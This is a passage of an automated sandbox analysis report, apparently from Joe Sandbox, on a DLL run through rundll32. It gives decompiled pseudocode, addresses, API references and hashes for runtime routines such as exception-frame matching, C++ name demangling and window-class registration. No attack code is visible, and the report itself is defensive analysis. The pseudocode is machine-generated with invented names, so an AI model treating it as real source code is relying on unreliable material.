																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E10005D39(_t306, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(_a24 != 0) {
														_push(1);
														E1000544E();
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E10005A3D(_t274, _t279, _t303, _t322);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E100068F0(_t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
																	_t240 = E10005A3D(_t274, _t279, _t303, _t322);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c));
										_t270 = E10005A3D(_t274, _t279, _t303, _t322);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E100068F0(_t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E1001200F(_t274, _t290, _t303, __eflags);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E100064CB( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, 0x1004da94) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E1000544E();
											_t279 =  &_v68;
											E1000647B( &_v68);
											E10004C0B( &_v68, 0x1004b054);
											L66:
											 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
											_t233 = E10005A3D(_t274, _t279, _t303, _t322);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E10004E9B(_t279, _t234, _t274);
											E100067E5(_a8, _a16, _t308);
											_t237 = E10006A10(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E1000675C(_t274, _t279, _t303, _t308, _t322, __eflags);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

0x10005db9
0x10005db9
0x10005dc0
0x10005dc2
0x10005dcb
0x10005dd1
0x10005dd4
0x10005dd9
0x10005ddc
0x10005de2
0x10006169
0x10006169
0x1000616e
0x10006170
0x10006172
0x10006175
0x10006176
0x10006179
0x1000617f
0x1000629e
0x10006185
0x10006185
0x10006186
0x10006187
0x1000618e
0x10006191
0x10006194
0x1000619a
0x1000619c
0x100061a1
0x100061a4
0x100061a6
0x100061ac
0x100061ae
0x100061b4
0x100061c9
0x100061ce
0x100061d1
0x100061d3
0x1000629a
0x00000000
0x1000629b
0x100061d3
0x100061b4
0x100061ac
0x100061a4
0x100061d9
0x100061dc
0x100061df
0x100061e2
0x100061e5
0x100061eb
0x100061fd
0x10006202
0x10006205
0x10006208
0x1000620b
0x1000620e
0x10006211
0x10006214
0x00000000
0x00000000
0x1000621a
0x1000621a
0x1000621d
0x10006220
0x1000622f
0x10006230
0x10006230
0x10006232
0x10006235
0x00000000
0x00000000
0x10006237
0x1000623a
0x00000000
0x00000000
0x10006248
0x1000624a
0x1000624d
0x1000624f
0x10006257
0x10006257
0x1000625a
0x1000625c
0x1000625e
0x1000627a
0x1000627f
0x10006282
0x10006282
0x00000000
0x1000625a
0x10006251
0x10006255
0x00000000
0x00000000
0x00000000
0x10006285
0x10006288
0x10006289
0x1000628c
0x1000628f
0x10006292
0x10006295
0x10006295
0x00000000
0x10006220
0x1000629f
0x100062a4
0x100062a5
0x100062a8
0x100062ab
0x100062ac
0x100062ad
0x100062ae
0x100062b1
0x100062b3
0x1000632b
0x1000632d
0x1000632d
0x100062b5
0x100062b5
0x100062b8
0x100062bb
0x00000000
0x100062bd
0x100062bd
0x100062c0
0x100062c3
0x100062ca
0x100062ca
0x100062cd
0x100062cf
0x100062d1
0x10006303
0x10006303
0x10006306
0x1000630d
0x1000630d
0x10006310
0x10006313
0x1000631a
0x1000631a
0x1000631d
0x10006324
0x10006326
0x10006326
0x1000631f
0x1000631f
0x10006322
0x00000000
0x00000000
0x10006322
0x10006315
0x10006315
0x10006318
0x00000000
0x00000000
0x10006318
0x10006308
0x10006308
0x1000630b
0x00000000
0x00000000
0x1000630b
0x10006327
0x100062d3
0x100062d3
0x100062d3
0x100062d6
0x100062d6
0x100062d8
0x100062da
0x00000000
0x00000000
0x100062dc
0x100062de
0x100062f2
0x100062f2
0x100062e0
0x100062e0
0x100062e3
0x100062e6
0x00000000
0x100062e8
0x100062e8
0x100062eb
0x100062ee
0x100062f0
0x00000000
0x00000000
0x00000000
0x00000000
0x100062f0
0x100062e6
0x100062fb
0x100062fb
0x100062fd
0x00000000
0x100062ff
0x100062ff
0x100062ff
0x00000000
0x100062fd
0x100062f6
0x100062f8
0x100062f8
0x00000000
0x100062f8
0x100062c5
0x100062c5
0x100062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x100062c8
0x100062c3
0x100062bb
0x1000632e
0x10006332
0x10006332
0x10005df1
0x10005df1
0x10005dfa
0x10005efc
0x10005efc
0x00000000
0x10005e29
0x10005e29
0x10005e2e
0x10005efe
0x10005efe
0x10005f01
0x00000000
0x10005e34
0x10005e34
0x10005e3c
0x10006100
0x10006104
0x10005e42
0x10005e47
0x10005e4a
0x10005e4f
0x10005e56
0x10005e5b
0x00000000
0x10005e93
0x10005e9b
0x10005f06
0x10005f06
0x10005f09
0x10005f0c
0x10005f0c
0x10005f0f
0x10005f12
0x10005f18
0x100060cf
0x100060cf
0x100060d2
0x00000000
0x100060d4
0x100060d4
0x100060d8
0x00000000
0x100060de
0x100060de
0x100060e1
0x100060e4
0x100060e5
0x100060e6
0x100060e9
0x100060ea
0x100060ed
0x100060ee
0x100060f3
0x00000000
0x100060f3
0x100060d8
0x10005f1e
0x10005f1e
0x10005f22
0x00000000
0x10005f28
0x10005f28
0x10005f2f
0x10005f47
0x10005f47
0x10005f4a
0x10005f50
0x10005f60
0x10005f65
0x10005f68
0x10005f6b
0x10005f6e
0x10005f71
0x10005f74
0x10005f77
0x10005f7d
0x10005f7d
0x10005f80
0x10005f83
0x10005f92
0x10005f93
0x10005f93
0x10005f95
0x10005f98
0x10005f9e
0x10005fa1
0x10005fa7
0x10005fa9
0x10005fac
0x10005faf
0x10005fb8
0x10005fbb
0x10005fbd
0x10005fbd
0x10005fc0
0x10005fc3
0x10005fc6
0x10005fc9
0x10005fcc
0x10005fd1
0x10005fd2
0x10005fd3
0x10005fd4
0x10005fd5
0x10005fd8
0x10005fda
0x10005fdc
0x00000000
0x10005fde
0x10005fde
0x10005fde
0x10005fe1
0x10005fe4
0x10005fe6
0x10005fe7
0x10005fec
0x10005fef
0x10005ff1
0x00000000
0x00000000
0x10005ff3
0x10005ff4
0x10005ff7
0x10005ff9
0x00000000
0x10005ffb
0x10005ffb
0x10005ffe
0x10006001
0x00000000
0x10006001
0x00000000
0x10005ff9
0x10006015
0x1000601b
0x1000601f
0x1000603c
0x10006041
0x10006041
0x10006044
0x10006044
0x00000000
0x10006004
0x10006004
0x10006005
0x10006008
0x1000600b
0x1000600e
0x1000600e
0x00000000
0x10006013
0x10005faf
0x10005fa1
0x10006047
0x1000604a
0x1000604b
0x1000604e
0x10006051
0x10006054
0x10006057
0x10006057
0x10006060
0x10006063
0x10006063
0x10006063
0x10005f77
0x10006065
0x10006069
0x1000606b
0x1000606e
0x10006074
0x10006074
0x10006075
0x10006079
0x100060f6
0x100060f6
0x100060fb
0x100060fe
0x00000000
0x00000000
0x00000000
0x00000000
0x1000607b
0x10006082
0x10006087
0x00000000
0x10006089
0x10006089
0x1000608d
0x1000609f
0x100060a2
0x100060a5
0x100060a7
0x100060be
0x100060c2
0x100060c8
0x100060c9
0x100060cb
0x00000000
0x100060cd
0x00000000
0x100060cd
0x100060a9
0x100060ae
0x100060b1
0x100060b6
0x100060b9
0x00000000
0x100060b9
0x1000608f
0x10006092
0x10006095
0x10006097
0x00000000
0x10006099
0x10006099
0x1000609d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000609d
0x10006097
0x1000608d
0x10006087
0x10005f31
0x10005f31
0x10005f38
0x00000000
0x10005f3a
0x10005f3a
0x10005f41
0x00000000
0x00000000
0x00000000
0x00000000
0x10005f41
0x10005f38
0x10005f2f
0x10005f22
0x10005e9d
0x10005ea5
0x10005ea8
0x10005ead
0x10005eb1
0x10005eb4
0x10005eba
0x10005ebd
0x00000000
0x10005ebf
0x10005ebf
0x10005ec2
0x10005ec4
0x10006105
0x10006105
0x10005eca
0x10005eca
0x10005ecc
0x10005ecf
0x10005eeb
0x10005eec
0x10005eef
0x10005ef2
0x10005ef4
0x00000000
0x10005efa
0x00000000
0x10005efa
0x00000000
0x10005ef4
0x10005ecf
0x1000610a
0x1000610a
0x1000610c
0x1000610d
0x10006114
0x10006117
0x10006125
0x1000612a
0x1000612f
0x10006132
0x10006137
0x1000613a
0x1000613d
0x10006140
0x10006142
0x10006144
0x10006144
0x10006149
0x10006155
0x1000615b
0x10006160
0x10006163
0x10006164
0x00000000
0x10006164
0x10005ebd
0x10005e9b
0x10005e5b
0x10005e3c
0x10005e2e
0x10005dfa

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 10005EB4
type_info::operator==.LIBVCRUNTIME ref: 10005EDB
___TypeMatch.LIBVCRUNTIME ref: 10005FE7
IsInExceptionSpec.LIBVCRUNTIME ref: 100060C2
_UnwindNestedFrames.LIBCMT ref: 10006149
CallUnexpected.LIBVCRUNTIME ref: 10006164

Strings

csm, xrefs: 10005E61
csm, xrefs: 10005F12
csm, xrefs: 10005DF4

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction ID: db32c1024e391476e5cdf26b8d57ef01a1901657407386c4c16bdeae4e47b44c
Opcode Fuzzy Hash: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction Fuzzy Hash: 91C18E7590024ADFEF15CF94C88099FBBB6FF08395F214569F8056B20AD732EA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF24, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000CF24(void* __edx, char** _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char** _v48;
				char _v56;
				char _v64;
				void* __ebp;
				signed int _t50;
				char** _t56;
				char** _t57;
				char** _t59;
				char* _t65;
				char** _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				char** _t82;
				char* _t83;
				char _t84;
				signed int* _t112;
				char* _t115;
				intOrPtr* _t117;
				signed int* _t118;
				intOrPtr _t120;
				intOrPtr* _t121;
				signed int _t123;

				_t113 = __edx;
				_t50 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t50 ^ _t123;
				_t82 = _a4;
				_t117 =  *0x1004e004; // 0x0
				_v48 = _t82;
				_t84 =  *_t117;
				_t53 = _t84 + 0xffffffd0;
				_v33 = _t84;
				if(_t84 + 0xffffffd0 > 9) {
					if(_t84 != 0x3f) {
						if(E1000D3E3(_t117, "template-parameter-", 0x13) != 0) {
							if(E1000D3E3(_t117, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t56 = E100071BE( &_v56, 0x1004e004, 0x40);
									L20:
									_t83 = _t56[1];
									_t115 =  *_t56;
								} else {
									_t115 = 0;
									_t83 = 0;
									 *0x1004e004 = _t117 + 1;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t120 = _t117 + 0xd;
							_v28 = 0xe;
							L9:
							 *0x1004e004 = _t120;
							E1000BC98(_t113,  &_v44);
							if(( *0x1004e00c & 0x00004000) == 0 ||  *0x1004e014 == 0) {
								E100076A6(E1000723E( &_v56,  &_v32),  &_v32,  &_v44);
								_t65 =  &_v64;
								goto L14;
							} else {
								E1000BD27( &_v44,  &_v24, 0x10);
								_t121 =  *0x1004e014; // 0x0
								 *0x1004223c(E10010036( &_v44,  &_v24));
								if( *_t121() == 0) {
									E100076A6(E1000723E( &_v64,  &_v32),  &_v32,  &_v44);
									_t65 =  &_v56;
									L14:
									_t56 = E100076C8( &_v32, _t65, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t56 = E10006E34( &_v44, _t71);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t120 = _t117 + 0x13;
						_v28 = 0x14;
						goto L9;
					} else {
						_t76 = E1000C18C(__edx,  &_v44, 0);
						_t115 =  *_t76;
						_t83 = _t76[1];
						_t77 =  *0x1004e004; // 0x0
						_v32 = _t115;
						_v28 = _t83;
						_t78 = _t77 + 1;
						 *0x1004e004 = _t78;
						if( *_t77 != 0x40) {
							_t79 = _t78 - 1;
							 *0x1004e004 = _t78 - 1;
							E10007596( &_v32, (0 |  *_t79 != 0x00000000) + 1);
							_t83 = _v28;
							_t115 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t118 =  *0x1004dffc; // 0x0
							if( *_t118 != 9 && _t115 != 0) {
								_t59 = E1000A9CF(0x1004e020, 8);
								if(_t59 != 0) {
									 *_t59 = _t115;
									_t59[1] = _t83;
									 *_t118 =  *_t118 + 1;
									 *(_t118 + 4 +  *_t118 * 4) = _t59;
								}
							}
						}
						_t57 = _v48;
						 *_t57 = _t115;
						_t57[1] = _t83;
						goto L27;
					}
				} else {
					_t112 =  *0x1004dffc; // 0x0
					 *0x1004e004 = _t117 + 1;
					E100075C8(_t112, _t82, _t53);
					_t57 = _t82;
					L27:
					return E100037EA(_t57, _v8 ^ _t123, _t113);
				}
			}

0x1000cf24
0x1000cf2a
0x1000cf31
0x1000cf35
0x1000cf39
0x1000cf3f
0x1000cf42
0x1000cf47
0x1000cf4a
0x1000cf50
0x1000cf71
0x1000cfd5
0x1000cffc
0x1000d0c7
0x1000d0e6
0x1000d0eb
0x1000d0eb
0x1000d0ee
0x1000d0cf
0x1000d0cf
0x1000d0d2
0x1000d0d4
0x1000d0d4
0x00000000
0x1000d0c7
0x1000d002
0x1000d009
0x1000d00c
0x1000d013
0x1000d016
0x1000d01d
0x1000d02d
0x1000d0b9
0x1000d0be
0x00000000
0x1000d038
0x1000d041
0x1000d046
0x1000d059
0x1000d064
0x1000d08e
0x1000d093
0x1000d096
0x1000d09c
0x00000000
0x1000d09c
0x1000d066
0x1000d06d
0x1000d071
0x00000000
0x1000d071
0x1000d02d
0x1000cfd7
0x1000cfde
0x1000cfe1
0x00000000
0x1000cf73
0x1000cf79
0x1000cf80
0x1000cf82
0x1000cf85
0x1000cf8a
0x1000cf8d
0x1000cf92
0x1000cf93
0x1000cf9b
0x1000cfa1
0x1000cfa4
0x1000cfb3
0x1000cfb8
0x1000cfbb
0x1000cfbb
0x1000d0f0
0x1000d0f4
0x1000d0f6
0x1000d0ff
0x1000d10c
0x1000d113
0x1000d115
0x1000d117
0x1000d11a
0x1000d11e
0x1000d11e
0x1000d113
0x1000d0ff
0x1000d122
0x1000d125
0x1000d127
0x00000000
0x1000d12a
0x1000cf52
0x1000cf52
0x1000cf5b
0x1000cf61
0x1000cf66
0x1000d12b
0x1000d138
0x1000d138

APIs

Replicator::operator[].LIBVCRUNTIME ref: 1000CF61
DName::operator=.LIBVCRUNTIME ref: 1000CFB3

Strings

template-parameter-, xrefs: 1000CFC5
@, xrefs: 1000D0C9
generic-type-, xrefs: 1000CFEC

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3211817929-1320211309
Opcode ID: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction ID: e026a952384d41eb90ae7b1f9d44a7b3bc4911ee2c14a530ba52aab493f896e0
Opcode Fuzzy Hash: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction Fuzzy Hash: 48611771D002499FEB10DF54D985BEEBBF8EF09380F10801AE605E7295DB74AD45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000218B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000218B(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a16) {
				struct tagMSG _v32;
				struct _WNDCLASSEXA _v80;
				void* _t26;
				struct HINSTANCE__* _t39;

				_t39 = _a4;
				LoadStringA(_t39, 0x82, 0x1004db68, 0x64);
				LoadStringA(_t39, 0x81, 0x1004dbd0, 0x64);
				_v80.cbSize = 0x30;
				_v80.style = 3;
				_v80.lpfnWndProc = E10001AC4;
				_v80.cbClsExtra = 0;
				_v80.cbWndExtra = 0;
				_v80.hInstance = _t39;
				_v80.hIcon = 0;
				_v80.hCursor = LoadCursorA(0, 0x7f00);
				_v80.hbrBackground = 6;
				_v80.lpszMenuName = 0x81;
				_v80.lpszClassName = 0x1004dbd0;
				_v80.hIconSm = 0;
				RegisterClassExA( &_v80);
				_t26 = E100012B1(_t39, _a16);
				if(_t26 != 0) {
					if(GetMessageA( &_v32, 0, 0, 0) == 0) {
						L4:
						return _v32.wParam;
					}
					do {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
					} while (GetMessageA( &_v32, 0, 0, 0) != 0);
					goto L4;
				}
				return _t26;
			}

0x1000219a
0x100021aa
0x100021ba
0x100021be
0x100021cb
0x100021d2
0x100021d9
0x100021dc
0x100021df
0x100021e2
0x100021eb
0x100021f2
0x100021f9
0x100021fc
0x10002203
0x10002206
0x10002210
0x10002219
0x1000222c
0x10002251
0x00000000
0x10002251
0x10002230
0x10002234
0x1000223e
0x1000224d
0x00000000
0x10002230
0x10002258

APIs

LoadStringA.USER32 ref: 100021AA
LoadStringA.USER32 ref: 100021BA
LoadCursorA.USER32 ref: 100021E5
RegisterClassExA.USER32 ref: 10002206

Part of subcall function 100012B1: GetVersionExA.KERNEL32(?), ref: 100012E0
Part of subcall function 100012B1: CreateWindowExA.USER32 ref: 1000131E
Part of subcall function 100012B1: ShowWindow.USER32(00000000,?), ref: 1000132E
Part of subcall function 100012B1: UpdateWindow.USER32 ref: 10001335

GetMessageA.USER32 ref: 10002228
TranslateMessage.USER32 ref: 10002234
DispatchMessageA.USER32 ref: 1000223E
GetMessageA.USER32 ref: 1000224B

Strings

0, xrefs: 100021BE

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Message$LoadWindow$String$ClassCreateCursorDispatchRegisterShowTranslateUpdateVersion
String ID: 0
API String ID: 1669850144-4108050209
Opcode ID: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction ID: 6fe8cfb5187b65730e66161c813667806370dfcb888eacca90ee75b3e607f7b9
Opcode Fuzzy Hash: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction Fuzzy Hash: 0721F872D01229AAEB11DFA5DE84EDFBBBCEF49754F11401AF600F2140D7B99902CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10008D42, Relevance: 15.3, APIs: 10, Instructions: 338
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10008D42(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				intOrPtr* _t134;
				signed int* _t136;
				signed char _t141;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				signed int* _t159;
				signed int* _t160;
				signed int _t161;
				signed char _t180;
				signed int _t181;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				void* _t197;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				signed char _t210;
				signed char _t211;
				signed int _t221;
				intOrPtr _t226;
				intOrPtr* _t228;
				signed int _t229;
				void* _t232;
				signed int _t234;
				void* _t244;

				_t134 =  *0x1004e004; // 0x0
				_t211 =  *_t134;
				if(_t211 == 0) {
					E10007662(_t211, _a4, 1, _a8);
					L93:
					_t136 = _a4;
					L94:
					return _t136;
				}
				_v16 = _v16 & 0x00000000;
				_t3 = _t134 + 1; // 0x1
				_t228 = _t3;
				_v12 = _v12 & 0x00000000;
				_t203 = _t211 & 0x000000ff;
				 *0x1004e004 = _t228;
				_t232 = 2;
				_t244 = _t203 - 0x4e;
				if(_t244 > 0) {
					__eflags = _t203 - 0x4f;
					if(__eflags == 0) {
						_v32 = "long ";
						_v28 = 5;
						E10007500( &_v16,  &_v32);
						L79:
						_v32 = "double";
						_t213 =  &_v16;
						_v28 = 6;
						E10007748( &_v16,  &_v32);
						L80:
						_t141 = 0;
						_t204 = _t203 - 0x43;
						if(_t204 == 0) {
							_v32 = "signed ";
							_v28 = 7;
							L88:
							_t213 = E1000723E( &_v24,  &_v32);
							E100076A6(_t143,  &_v32,  &_v16);
							_v16 = _v32;
							_v12 = _v28;
							L89:
							_t147 = _a8;
							if( *_a8 != 0) {
								E100077A0( &_v16, E10007637(_t213,  &_v32, 0x20, _t147));
							}
							_t136 = _a4;
							 *_t136 = _v16;
							_t136[1] = _v12;
							goto L94;
						}
						_t205 = _t204 - _t232;
						if(_t205 == 0) {
							L33:
							_v32 = "unsigned ";
							_v28 = 9;
							goto L88;
						}
						_t206 = _t205 - _t232;
						if(_t206 == 0) {
							goto L33;
						}
						_t207 = _t206 - _t232;
						if(_t207 == 0) {
							goto L33;
						}
						_t208 = _t207 - _t232;
						if(_t208 == 0) {
							goto L33;
						}
						if(_t208 != 0x14) {
							goto L89;
						}
						L28:
						_t152 = (_t141 & 0x000000ff) - 0x45;
						if(_t152 == 0) {
							goto L33;
						}
						_t153 = _t152 - _t232;
						if(_t153 == 0) {
							goto L33;
						}
						_t154 = _t153 - _t232;
						if(_t154 == 0) {
							goto L33;
						}
						_t155 = _t154 - _t232;
						if(_t155 == 0 || _t155 == _t232) {
							goto L33;
						} else {
							goto L89;
						}
					}
					if(__eflags <= 0) {
						L76:
						 *0x1004e004 = _t228 - 1;
						_t159 = E10009F87( &_v32);
						_t213 =  *_t159;
						_t229 = _t159[1];
						_v16 = _t213;
						_v12 = _t229;
						__eflags = _t213;
						if(_t213 != 0) {
							goto L80;
						}
						L59:
						_t136 = _a4;
						 *_t136 = _t213;
						_t136[1] = _t229;
						goto L94;
					}
					__eflags = _t203 - 0x53;
					if(_t203 <= 0x53) {
						_t210 = _t203 & 0x00000003;
						__eflags = _t210;
						L65:
						_t160 = _a8;
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t160;
						_t161 = _t160[1];
						_v32 = _t221;
						_v28 = _t161;
						__eflags = _t210 - 0xfffffffe;
						if(_t210 != 0xfffffffe) {
							__eflags = _t221;
							if(_t221 == 0) {
								_t234 = _t210 & 0x00000002;
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = "volatile";
										_v20 = 8;
										E10007500( &_v16,  &_v24);
									}
								} else {
									_v24 = "const";
									_v20 = 5;
									E10007500( &_v16,  &_v24);
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = " volatile";
										_v20 = 9;
										E10007748( &_v16,  &_v24);
									}
								}
							}
							E1000B576(_t210, _a4,  &_v16,  &_v32, 1);
							goto L93;
						}
						_v28 = _t161 | 0x00000800;
						E1000B576(_t210,  &_v24,  &_v16,  &_v32, 0);
						_t229 = _v20;
						__eflags = 0x00000800 & _t229;
						if((0x00000800 & _t229) == 0) {
							_v32 = 0x10042dd4;
							_v28 = 2;
							E10007748( &_v24,  &_v32);
							_t229 = _v20;
						}
						_t213 = _v24;
						goto L59;
					}
					__eflags = _t203 - 0x58;
					if(_t203 == 0x58) {
						_v32 = "void";
						_v28 = 4;
						L12:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L89;
					}
					__eflags = _t203 - 0x5f;
					if(_t203 != 0x5f) {
						goto L76;
					}
					_t180 =  *_t228;
					_t23 = _t228 + 1; // 0x2
					_t226 = _t23;
					_v5 = _t180;
					_t181 = _t180 & 0x000000ff;
					 *0x1004e004 = _t226;
					__eflags = _t181 - 0x4e;
					if(__eflags > 0) {
						__eflags = _t181 - 0x53;
						if(__eflags > 0) {
							__eflags = _t181 - 0x55;
							if(_t181 == 0x55) {
								_v32 = "char32_t";
								L42:
								_v28 = 8;
								L26:
								_t213 =  &_v16;
								E10007500( &_v16,  &_v32);
								L27:
								_t141 = _v5;
								goto L28;
							}
							__eflags = _t181 - 0x57;
							if(_t181 == 0x57) {
								_v32 = "wchar_t";
								L37:
								_v28 = 7;
								goto L26;
							}
							__eflags = _t181 + 0xffffffa8 - 1;
							if(_t181 + 0xffffffa8 > 1) {
								L60:
								_v32 = "UNKNOWN";
								goto L37;
							}
							_t51 = _t226 - 1; // 0x1
							 *0x1004e004 = _t51;
